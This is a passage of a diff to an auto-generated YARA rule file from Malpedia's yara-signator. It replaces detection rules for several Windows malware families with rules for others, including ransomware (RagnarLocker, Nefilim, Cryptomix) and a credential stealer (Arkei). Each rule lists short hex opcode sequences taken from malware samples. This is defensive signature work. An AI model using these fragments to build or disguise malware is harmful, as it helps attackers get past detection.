-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.krbanker_auto.yar#L1-L115"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ragnarlocker"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ragnarlocker_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "3f68b288c9b94489462004d900c99f82c6cc93e611f88ed341834ce27199e0a6"
+		logic_hash = "a0b16ae3dec166e9354e89e87f8c27a6b4e207c9c50c554aa69c08f1891c036a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -133617,32 +134050,32 @@ rule MALPEDIA_Win_Krbanker_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 51 8b4c2410 57 6a01 }
-		$sequence_1 = { 50 ff5208 8b4e04 33c0 85c9 }
-		$sequence_2 = { 8d7908 7413 8b4818 8d5108 8b4904 }
-		$sequence_3 = { 8945c0 ff75c0 ff75c4 ff75c8 ff75cc }
-		$sequence_4 = { 8bf0 83c40c 83feff 0f848f000000 56 57 }
-		$sequence_5 = { 8b4824 33db 49 85c9 0f9cc3 }
-		$sequence_6 = { 53 57 e8???????? 8bf0 83c40c 83feff }
-		$sequence_7 = { 6a00 686c000000 6801000000 bb40010000 e8???????? }
-		$sequence_8 = { 8b4104 894504 8b5108 895508 8b410c }
-		$sequence_9 = { 6801010080 6a00 6870000000 6801000000 bb40010000 }
+		$sequence_0 = { 33d2 8b4dd4 8bf1 0fa4c119 c1ee07 c1e019 0bd1 }
+		$sequence_1 = { 33ff 33f6 66660f1f840000000000 8bc6 8a9c3500ffffff 33d2 0fb6cb }
+		$sequence_2 = { 317dc0 33f6 8b55f4 8bfa 8b4de8 }
+		$sequence_3 = { 57 ff15???????? 85c0 0f852cffffff 57 ff15???????? 6a28 }
+		$sequence_4 = { c1e108 0bc8 894b28 0fb64f13 0fb64712 c1e108 0bc8 }
+		$sequence_5 = { 234dac 33f1 8b45e4 8b4df0 03de 13fa 035d88 }
+		$sequence_6 = { 72f2 8b5df8 8b7df4 57 c6043900 ff15???????? 50 }
+		$sequence_7 = { 7cd8 ff75f8 ff15???????? 5f 5e b001 5b }
+		$sequence_8 = { 33f1 03d7 8b7df4 13fe 0355fc 8955e8 }
+		$sequence_9 = { 0fa4ca1e c1ef02 8975e8 33f6 0bf2 c1e11e 3175f4 }
 
 	condition:
-		7 of them and filesize < 1826816
+		7 of them and filesize < 147456
 }
-rule MALPEDIA_Win_Unidentified_092_Auto : FILE
+rule MALPEDIA_Win_Nefilim_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a832d924-1526-5b98-85cb-a6a677c2763a"
+		id = "1a64ad05-cdf4-50b0-b5d5-12b823b566f1"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_092"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_092_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nefilim"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.nefilim_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "652402e87963cd0c6ff5366fe9ef518c3ad3cc147775da4e4b2ee294d04144ab"
+		logic_hash = "437ef32e0bcb845260c527798fe2225eeb3cd5a3921b5194205f4e5468ee3dde"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -133656,32 +134089,32 @@ rule MALPEDIA_Win_Unidentified_092_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8955fc 3bc8 7313 8bcf 89471c e8???????? 8bc7 }
-		$sequence_1 = { 8bcf e8???????? 83c404 6a02 6a00 53 }
-		$sequence_2 = { 03d6 23cb 8bf0 894d08 8bcf 234df4 094d08 }
-		$sequence_3 = { e8???????? 8bd7 8bc8 e8???????? 8b45e8 83f808 720d }
-		$sequence_4 = { 6a00 6a01 8d45eb c645eb29 50 57 }
-		$sequence_5 = { 0f4345d4 6800040000 50 ff75b4 ff15???????? c645fc00 8b45d0 }
-		$sequence_6 = { 33d1 8b4d08 8bf9 03d6 23cb 0bfb 237de4 }
-		$sequence_7 = { 3d00100000 722a f6c11f 0f8500050000 8b41fc 3bc1 0f83f5040000 }
-		$sequence_8 = { e8???????? 84c0 7439 68???????? 8d8d80f6ffff e8???????? 8d8d64f6ffff }
-		$sequence_9 = { c745cc00000000 c645bc00 e8???????? c645fc01 81ff00040000 7d21 be00040000 }
+		$sequence_0 = { 50 c745f4e8a14000 e8???????? cc 8bff 55 8bec }
+		$sequence_1 = { e9???????? 8975e4 33c0 39b8c8e74000 0f8491000000 ff45e4 }
+		$sequence_2 = { ff75ec 68???????? 56 56 }
+		$sequence_3 = { 56 56 895dc0 ff15???????? 56 }
+		$sequence_4 = { ff15???????? 8144242890d00300 8b44241c 115c242c 3944242c 0f8c3dffffff 0f8f5d010000 }
+		$sequence_5 = { 85c0 7434 68???????? 8d8424d0000000 }
+		$sequence_6 = { ffd6 85c0 0f84cc030000 68???????? 8d8424d0000000 }
+		$sequence_7 = { 6a01 8d74246c e8???????? 83ec1c 8bcc 217910 33c0 }
+		$sequence_8 = { 8b442418 8b4c241c 53 03c6 53 13cb }
+		$sequence_9 = { 2bc8 83f901 770a 68???????? e8???????? 8d5801 6a00 }
 
 	condition:
-		7 of them and filesize < 10202112
+		7 of them and filesize < 142336
 }
-rule MALPEDIA_Win_Acidbox_Auto : FILE
+rule MALPEDIA_Win_Bandit_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ef6a2660-06bc-58c1-866c-71c4f81cb840"
+		id = "381568fe-b706-59c8-a395-3dcbe088e7b0"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.acidbox"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.acidbox_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bandit"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.bandit_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "41839e3e93fea6da491d6960f541c70a4bfe5cfb4dca07d8fcde4687922f61de"
+		logic_hash = "d56d1fb9d0bb1a835a79b856616244ad303b75dee12b9e7ce8956718588a906b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -133695,32 +134128,32 @@ rule MALPEDIA_Win_Acidbox_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { bb0c010480 eb4b 41b800000206 413bd0 7322 483998a8000000 74e5 }
-		$sequence_1 = { 74d9 488b842420050000 488b8038010000 4885c0 750a bb0c130480 e9???????? }
-		$sequence_2 = { 881401 4401b3f4160000 664401b493bc000000 8b83f0160000 412bc6 3983f4160000 753e }
-		$sequence_3 = { c7442454ff000000 c7442458ccccf048 c744245c0000ffff c74424600fba2dcc c7442464ffffff00 c7442468cccccc00 }
-		$sequence_4 = { 498b07 488b5598 44896594 428834a0 498b07 488b75a8 46885ca001 }
-		$sequence_5 = { 897c2424 410fb74606 443be8 734f 488d9424d0010000 498bcf ff15???????? }
-		$sequence_6 = { 450f44d3 48894da0 ba01000000 412bf2 44895588 8bce 4403d6 }
-		$sequence_7 = { 83fe03 72da 8b477c 410fb7ce 83c6fd 410fb70442 664123c8 }
-		$sequence_8 = { c745d8fdffffff 4c8b7de0 eb1a 448bf2 8bf2 c7071c000000 c745d801000000 }
-		$sequence_9 = { 8bf7 49897ba0 448bff 49897bb0 }
+		$sequence_0 = { 488b542448 488bb424c0000000 488bbc2480000000 4c8b842448010000 4939f8 7f1a 4c8b8c2430010000 }
+		$sequence_1 = { eb02 31d2 4889442438 48895c2428 84d2 7407 b901000000 }
+		$sequence_2 = { e9???????? 49c7417000000000 b801000000 488bac2438010000 4881c440010000 c3 31c0 }
+		$sequence_3 = { 4d89c8 4c894c2468 488d1582b94e00 e8???????? 4c8b4c2468 c78424b400000001000000 c78424a000000001000000 }
+		$sequence_4 = { 749b 440f11bc24c0000000 440f11bc24d0000000 488b9424f8000000 48899424c0000000 488bb42400010000 4889b424c8000000 }
+		$sequence_5 = { 4d8d0cf3 4d8d49d8 833d????????00 7525 4c8b4c2458 4d894cf3d8 498d34f3 }
+		$sequence_6 = { 488b6c2430 4883c438 c3 488d0555df9400 488b6c2430 4883c438 c3 }
+		$sequence_7 = { 4c89a424b8000000 488b9424b0000000 4885d2 7426 440fb66a17 4589ef 4183e51f }
+		$sequence_8 = { e8???????? 4889442440 48895c2448 48894c2450 c644242700 488b542458 488b02 }
+		$sequence_9 = { 7404 488b4008 e8???????? 90 e8???????? 8b44242c 488b6c2458 }
 
 	condition:
-		7 of them and filesize < 589824
+		7 of them and filesize < 29914112
 }
-rule MALPEDIA_Win_Lodeinfo_Auto : FILE
+rule MALPEDIA_Win_Mgbot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "fef4135b-c37b-592e-9b9c-4313e3ff89af"
+		id = "dd03dc94-bb3a-5cad-8f13-4bbe4b7f90a6"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lodeinfo"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.lodeinfo_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mgbot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mgbot_auto.yar#L1-L114"
 		license_url = "N/A"
-		logic_hash = "e42d005c217ef3b217f52a6115c139a42c70e499d47cac23508862c48ef328f6"
+		logic_hash = "7310ce51cc81391fc78e9881bf8f490b2a783d4789728f7661df3e6bdca512d7"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -133734,32 +134167,32 @@ rule MALPEDIA_Win_Lodeinfo_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 898300010000 8b8558ffffff c7837001000000000000 e9???????? ba???????? 8bcf e8???????? }
-		$sequence_1 = { 75a8 8b55e4 8b7d14 8b4508 3bcf 0f84440a0000 }
-		$sequence_2 = { 3bf2 743f 50 ffb548ffffff 51 8b8d5cffffff 8bd1 }
-		$sequence_3 = { 7534 0fb64e04 0fbec3 3bc8 7529 0fb64e05 }
-		$sequence_4 = { 8be5 5d c3 83f806 754d 837e0408 8b4d14 }
-		$sequence_5 = { 0f8586000000 8d4ffc 034d08 e8???????? 8b1b 33ff 89450c }
-		$sequence_6 = { 8955d4 8d1418 8b45fc 8955d8 3b5008 7641 8b4008 }
-		$sequence_7 = { e8???????? 84c0 0f8481000000 83fe09 0f8592020000 8bb554ffffff }
-		$sequence_8 = { 024df4 8b45c4 880c30 8bc3 0fb64dfc 2bc1 99 }
-		$sequence_9 = { e8???????? ff75bc e8???????? ff75c0 e8???????? ff75cc }
+		$sequence_0 = { 5b 8be5 5d c20800 6808020000 e8???????? }
+		$sequence_1 = { 8be5 5d c20800 6808020000 e8???????? }
+		$sequence_2 = { 5d c20800 6808020000 e8???????? }
+		$sequence_3 = { 5b 8be5 5d c20800 6808020000 }
+		$sequence_4 = { 0f8553ffffff 5f 33c0 5e }
+		$sequence_5 = { 6808020000 e8???????? 6804010000 8bf0 }
+		$sequence_6 = { 8be5 5d c20800 6808020000 }
+		$sequence_7 = { 6808020000 e8???????? 6804010000 8bf0 6a00 56 }
+		$sequence_8 = { 6808020000 e8???????? 6804010000 8bf0 6a00 }
+		$sequence_9 = { 6808020000 e8???????? 6804010000 8bf0 6a00 56 e8???????? }
 
 	condition:
-		7 of them and filesize < 712704
+		7 of them and filesize < 1677312
 }
-rule MALPEDIA_Win_Winordll64_Auto : FILE
+rule MALPEDIA_Win_Cryptomix_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "08e3713d-71e0-5b8a-9ceb-d90daa753676"
+		id = "ee7d4b5d-fd38-5125-ac96-e606d0aa2a74"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.winordll64"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.winordll64_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptomix"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.cryptomix_auto.yar#L1-L176"
 		license_url = "N/A"
-		logic_hash = "a4a004425dba88268c2d3d715c259f2863978c42cd46c83d869be58ecc44a5d1"
+		logic_hash = "47824f768326cefd215579730913e815a8ef928dff6d4693ae0d6a1bbfe5f79b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -133773,32 +134206,38 @@ rule MALPEDIA_Win_Winordll64_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 33ff e9???????? 488b0b 4c8d442440 488d542450 ff5318 85c0 }
-		$sequence_1 = { 4533c0 8bd3 e8???????? 8bf0 85c0 }
-		$sequence_2 = { 488d4158 41b806000000 488d1528120100 483950f0 740b 488b10 4885d2 }
-		$sequence_3 = { ba11000000 41ff5720 33d2 448be2 4889542440 8bda 4889542448 }
-		$sequence_4 = { 486bdb1c 4803df 48895e10 4d6be41c 4c03e7 4c896608 }
-		$sequence_5 = { 4803d7 4c897c2420 ff15???????? 037578 33c9 e8???????? 483bc3 }
-		$sequence_6 = { ff15???????? e9???????? 488d15c61c0100 488d4dbc }
-		$sequence_7 = { 498bcc ff15???????? 48635538 488b4dd0 ff5730 4c635d38 4d03eb }
-		$sequence_8 = { eb06 ffc2 4883c002 66443930 75f4 488d742470 48837d8808 }
-		$sequence_9 = { 488bc1 48ffc0 ffc3 803800 75f6 4533c9 4533c0 }
+		$sequence_0 = { 68???????? ffd6 85c0 0f8503010000 837d0c01 }
+		$sequence_1 = { 85c0 0f85c1000000 8b35???????? 68007d0000 6a40 }
+		$sequence_2 = { 6801000080 ff15???????? 6a04 8d85e8fbffff 50 6a04 }
+		$sequence_3 = { 59 59 8945f0 5e 837dfc00 740d ff75fc }
+		$sequence_4 = { 3db4263169 0f85a4000000 b801000000 8b4dfc 33cd e8???????? }
+		$sequence_5 = { 7504 6a07 eb3e 83f803 }
+		$sequence_6 = { c3 55 8bec 51 68ee7fd6aa 6a05 }
+		$sequence_7 = { 668b01 83c102 6685c0 75f5 8b3d???????? 2bca }
+		$sequence_8 = { e8???????? 83c420 ff75fc e8???????? ff75fc e8???????? 59 }
+		$sequence_9 = { ff75f4 53 6a19 ff75fc e8???????? }
+		$sequence_10 = { e8???????? 68f097a090 6a05 e8???????? 83c410 8d4df0 }
+		$sequence_11 = { 8d85c4f9ffff 50 8d85e8fbffff 50 ffd3 ff750c }
+		$sequence_12 = { 6808020000 8d8df8fdffff 51 6a00 ffd0 ff7508 8d85e8f9ffff }
+		$sequence_13 = { 8d5201 663bc6 72f5 8bf7 c7450800010000 8a16 }
+		$sequence_14 = { 668b8df4fdffff 33c0 8d95f4fdffff 6685c9 7418 }
+		$sequence_15 = { e8???????? 59 59 ff742404 ffd0 c3 68c1ea9d27 }
 
 	condition:
-		7 of them and filesize < 278528
+		7 of them and filesize < 188416
 }
-rule MALPEDIA_Win_Unidentified_098_Auto : FILE
+rule MALPEDIA_Win_Karagany_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "77dc1ff9-dd3d-5bc9-85b5-203dd4f53718"
+		id = "98602626-f80c-53db-88a5-fef596efc6b3"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_098"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_098_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.karagany"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.karagany_auto.yar#L1-L115"
 		license_url = "N/A"
-		logic_hash = "0219ee65046a1130cad6fddadbb5a6a530711c105dcd628abbc82d2c03f62f83"
+		logic_hash = "e11ee77bbad2aed0526f0917e5fec6612f23198efabc3eebf7b6abb2227dd310"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -133812,32 +134251,32 @@ rule MALPEDIA_Win_Unidentified_098_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e9???????? 488b01 88542428 ff5048 0fb6542428 89c1 e9???????? }
-		$sequence_1 = { 83eb10 6644894104 83fb0f 7fcd bbf0ffffff 29d3 89d8 }
-		$sequence_2 = { 837c2448ff 0f94c0 4885c9 410f95c5 4120c5 0f8511010000 38c3 }
-		$sequence_3 = { ff5048 8b542440 89c5 e9???????? 4488bc248c000000 488bbc2498000000 4531ff }
-		$sequence_4 = { 85c0 0f8549ffffff 488d4360 4883c420 5b 5e 5f }
-		$sequence_5 = { f30f6f9c2430010000 0f11a3d9010000 0f11abe9010000 0f1183f9010000 0f118b09020000 0f119319020000 0f119b29020000 }
-		$sequence_6 = { ff5060 4c8b55b8 4839c3 7570 498b4500 4d89f0 4c89d2 }
-		$sequence_7 = { 4c894930 4c39c2 7c22 4c8d8c10ffffff7f 0f1f840000000000 4c89c8 4829d0 }
-		$sequence_8 = { e8???????? 4d8b37 e9???????? 410fb74654 4183c001 4883ea02 668902 }
-		$sequence_9 = { bd01000000 e9???????? 4889c1 e8???????? 498b06 4c89f1 ff5008 }
+		$sequence_0 = { 6a40 6800300000 6800000300 6a00 ff15???????? }
+		$sequence_1 = { ff15???????? 6a64 ff15???????? 5f 5e 33c0 5b }
+		$sequence_2 = { 55 8bec 81ec60060000 53 56 57 33c0 }
+		$sequence_3 = { ff15???????? 6a00 53 68???????? }
+		$sequence_4 = { 57 8bf8 6a03 57 ffd6 85c0 }
+		$sequence_5 = { c745a444000000 e8???????? 83c40c 8d45ec }
+		$sequence_6 = { 8945d0 8945d8 8945e0 8945e8 }
+		$sequence_7 = { 50 ff15???????? 6a00 53 68???????? }
+		$sequence_8 = { 6a03 53 ffd6 85c0 }
+		$sequence_9 = { 8945d8 8945e0 8945e8 8945ec 8945f4 }
 
 	condition:
-		7 of them and filesize < 3345408
+		7 of them and filesize < 180224
 }
-rule MALPEDIA_Win_C0D0So0_Auto : FILE
+rule MALPEDIA_Win_Kagent_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "bb44345c-7e5d-55a8-a363-6f4dd49ac691"
+		id = "5f4150a2-2cfd-5b67-9d04-7b313480e620"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.c0d0so0"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.c0d0so0_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kagent"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.kagent_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "268a1640f52d336fbac005894a892b3cb4160d26716dda753325e6e4796f541a"
+		logic_hash = "c73f32fc029a7be975356173769505731b12b0db3312b7f6e0626dcf79b9cedc"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -133851,32 +134290,32 @@ rule MALPEDIA_Win_C0D0So0_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 85c0 0f84c3000000 03c3 50 }
-		$sequence_1 = { ff15???????? f6450820 0f8520010000 395d08 0f8417010000 }
-		$sequence_2 = { 8b0e 33c0 83e912 57 7411 8a4e04 }
-		$sequence_3 = { 4a 7417 4a 740f 4a }
-		$sequence_4 = { eb62 8d45f4 50 57 8d45fc }
-		$sequence_5 = { 0b4f04 7506 8b00 85c0 75e2 53 }
-		$sequence_6 = { 83c40c 6a64 8d4598 50 33ff }
-		$sequence_7 = { 6a00 ffd6 50 ff15???????? 8bd8 85db 7503 }
-		$sequence_8 = { 83e20f 4a 742f 4a 7427 4a 741f }
-		$sequence_9 = { eb07 8a4901 eb02 8a09 57 }
+		$sequence_0 = { 8d45f4 64a300000000 8bf9 833d????????00 7516 32c0 8b4df4 }
+		$sequence_1 = { 50 e8???????? 83c404 897e40 8b4604 3bc7 }
+		$sequence_2 = { 8bcb e8???????? 8343180c 33c0 33f6 3903 }
+		$sequence_3 = { 50 50 52 e8???????? 8b45ec 50 }
+		$sequence_4 = { 8bcf ffd2 8b4508 5f 895e04 8906 5b }
+		$sequence_5 = { 2bc7 d1f8 8d1442 5f 895614 5e b83f000000 }
+		$sequence_6 = { e8???????? 89435c c6436001 8b4b5c }
+		$sequence_7 = { 83ff3a 0f84b2030000 83ff3b 0f84a9030000 66833857 0f85f9020000 668378023b }
+		$sequence_8 = { 2bc8 8bf9 897da4 eb0a c745a400000000 8b7da4 8b5214 }
+		$sequence_9 = { 8b45f0 83e3fd 85c0 7409 50 e8???????? 83c404 }
 
 	condition:
-		7 of them and filesize < 450560
+		7 of them and filesize < 4972544
 }
-rule MALPEDIA_Win_Calmthorn_Auto : FILE
+rule MALPEDIA_Win_Arkei_Stealer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "bcd75189-0c11-5940-85d3-d76aaafb784a"
+		id = "1a0abd06-565e-5d05-9c7f-92841d5839a1"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.calmthorn"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.calmthorn_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.arkei_stealer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.arkei_stealer_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "b3539324ecfb8790060aa38a018df9861445823951558eb7601785d0fde93a58"
+		logic_hash = "fe6b8a6d2dda0769d1bf75ba6fd29670ffe1d15e24be98e7feb6639e87efec8a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -133890,32 +134329,32 @@ rule MALPEDIA_Win_Calmthorn_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ebbb 0fb68d85fdffff 83f901 7552 c78504edffff00000000 eb0f 8b9504edffff }
-		$sequence_1 = { 8b9514f8ffff 0fbe02 85c0 7502 eb02 ebba 0fb68d9efdffff }
-		$sequence_2 = { eb0f 8b8d08a7ffff 83c101 898d08a7ffff 8b95c8b5ffff 52 e8???????? }
-		$sequence_3 = { eb02 ebba 0fb69568fdffff 83fa01 7553 0f57c0 660f1385347affff }
-		$sequence_4 = { 8b951c7cffff 83c201 8b85207cffff 83d000 89951c7cffff 8985207cffff 83bd207cffffff }
-		$sequence_5 = { 8b953cfaffff 52 e8???????? 83c404 3985b8e7ffff 7d20 8b853cfaffff }
-		$sequence_6 = { c785d8aeffff00000000 eb0f 8b85d8aeffff 83c001 8985d8aeffff 8b8db0bcffff 51 }
-		$sequence_7 = { 8b850899ffff 83d000 89950499ffff 89850899ffff 83bd0899ffff00 7722 720c }
-		$sequence_8 = { eb0f 8b950cb8ffff 83c201 89950cb8ffff 8b85c4daffff 50 e8???????? }
-		$sequence_9 = { ebbb 0fb68d73fdffff 83f901 7552 c785cce7ffff00000000 eb0f 8b95cce7ffff }
+		$sequence_0 = { 8945e8 ffd3 6a0a 57 }
+		$sequence_1 = { 33ff 50 57 897e10 894614 }
+		$sequence_2 = { 6a00 ffd6 8b55e8 52 6a00 ffd6 }
+		$sequence_3 = { 6a00 8d4de4 51 6a0e 8d55ec 52 }
+		$sequence_4 = { 57 8945e8 ffd3 6a0a 57 8bf0 ffd3 }
+		$sequence_5 = { c3 50 8b45e8 50 }
+		$sequence_6 = { 8b45e8 50 ff15???????? 85c0 74de 8b4de8 682000cc00 }
+		$sequence_7 = { e9???????? 83f810 770a bb10000000 e9???????? 83f818 0f8783010000 }
+		$sequence_8 = { 8d448a0e 6a00 8d4de4 51 }
+		$sequence_9 = { 51 ff15???????? 85c0 0f84c4feffff 57 6880000000 }
 
 	condition:
-		7 of them and filesize < 2322432
+		7 of them and filesize < 1744896
 }
-rule MALPEDIA_Win_Photoloader_Auto : FILE
+rule MALPEDIA_Win_Thunker_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a08024a5-b726-5fe7-bae6-d20cf144169e"
+		id = "6a7578c2-9954-5c27-9789-75ce33a8978d"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.photoloader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.photoloader_auto.yar#L1-L167"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.thunker"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.thunker_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "23120e8333171e7b242a43c78525c83b36a92ed0c9ad8db34350941d5629fd06"
+		logic_hash = "324dbb01ab87806e82adbcf168652688ad932f1c3e2806c75596e6aeba36cca3"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -133929,38 +134368,118 @@ rule MALPEDIA_Win_Photoloader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0fa2 894704 33c9 b800000040 }
-		$sequence_1 = { b800000040 0fa2 895f0c e8???????? }
-		$sequence_2 = { f7411400000020 7407 8b41f8 3901 }
-		$sequence_3 = { b801000000 0fa2 89442420 895c2424 894c2428 8954242c }
-		$sequence_4 = { 25ffffff00 0d00000005 e9???????? 8bd7 397b1c 7640 8bc2 }
-		$sequence_5 = { c0c003 0fb6c8 8bc1 83e10f }
-		$sequence_6 = { 8bf7 8d6f10 ff15???????? 0f31 }
-		$sequence_7 = { 488b5c2408 c3 0f31 4f8d1489 48c1e220 478b4cd308 480bc2 }
-		$sequence_8 = { ff15???????? 25ffffff00 0d00000007 eb4a }
-		$sequence_9 = { 7507 66c74424287800 8d442428 ba???????? }
-		$sequence_10 = { 85f6 7431 8b06 33ff 8bce 47 eb05 }
-		$sequence_11 = { 8bf0 8d6c2410 33c9 b801000080 0fa2 894500 895d04 }
-		$sequence_12 = { 741a 57 8bfb 8bc8 2bfa 66890c17 }
-		$sequence_13 = { ff15???????? 8bf0 85f6 746d 8d442418 50 8d442414 }
-		$sequence_14 = { ff542420 0f31 8bc8 8bf2 0f31 }
-		$sequence_15 = { e8???????? 03f8 8d0c7b e8???????? 8bc3 }
+		$sequence_0 = { 750b 68???????? e8???????? 59 68???????? 68???????? 6801000080 }
+		$sequence_1 = { 5b 5d c3 55 89e5 81ecc8010000 }
+		$sequence_2 = { 51 50 53 56 57 8b750c 8365f800 }
+		$sequence_3 = { e8???????? 83c40c 89c7 e8???????? 8985ecfdffff }
+		$sequence_4 = { baabaaaaaa f7e2 d1ea 8995dcfdffff 89d0 }
+		$sequence_5 = { e8???????? 6a06 53 e8???????? 83c410 eb40 6a04 }
+		$sequence_6 = { 83c40c 8d8544edffff 50 e8???????? 8985c4edffff 8b400c }
+		$sequence_7 = { e8???????? eb07 c685fbeeffff01 80bdfbeeffff00 }
+		$sequence_8 = { 83c40c 8d8544edffff 50 e8???????? 8985c4edffff }
+		$sequence_9 = { 89df 31c0 f9 19c9 }
 
 	condition:
-		7 of them and filesize < 107520
+		7 of them and filesize < 73728
 }
-rule MALPEDIA_Win_Upas_Auto : FILE
+rule MALPEDIA_Win_Infy_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ff6fa077-a4cc-5245-b43e-d462dbb909cf"
+		id = "1542bed5-33fb-5d90-921f-7b98aeb36304"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.upas"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.upas_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.infy"
